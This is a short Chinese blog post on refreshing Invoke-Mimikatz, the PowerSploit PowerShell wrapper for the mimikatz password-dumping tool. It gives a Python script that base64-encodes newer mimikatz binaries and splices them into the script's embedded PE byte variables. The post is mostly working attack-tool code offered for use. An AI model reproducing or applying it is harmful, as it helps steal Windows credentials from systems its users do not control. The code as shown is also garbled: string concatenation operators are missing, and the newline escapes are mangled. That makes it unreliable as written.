invoke-mimikatz是什么?invoke-mimikatz是powersploit渗透测试套装中的一个powershell版本的mimikatz工具,用来抓取windows操作系统中的密码。
但是其内置的mimikatz版本过低,导致在实际使用中会多多少少的有一些问题。
碰巧今天朋友问到了这个问题,于是就写下这个文章,希望对各位有所帮助(其实就是想水文)
根据朋友的描述,只要替换里面的内容即可,直接使用世界上最好的语言进行操作:
代码语言:javascript复制import fileinput
import base64
with open("./Win32/mimikatz.exe", "rb") as f:
win32 = base64.b64encode(f.read()).decode()
with open("./x64/mimikatz.exe", "rb") as f:
x64 = base64.b64encode(f.read()).decode()
for line in fileinput.FileInput("./Invoke-Mimikatz.ps1", inplace=1):
line = line.rstrip('rn')
if "$PEBytes64 = " in line:
print("$PEBytes64 = '" x64 "'")
elif "$PEBytes32 = " in line:
print("$PEBytes32 = '" win32 "'")
else:
print(line)然后我们就得到了一个高版本mimikatz的invoke-mimikatz了
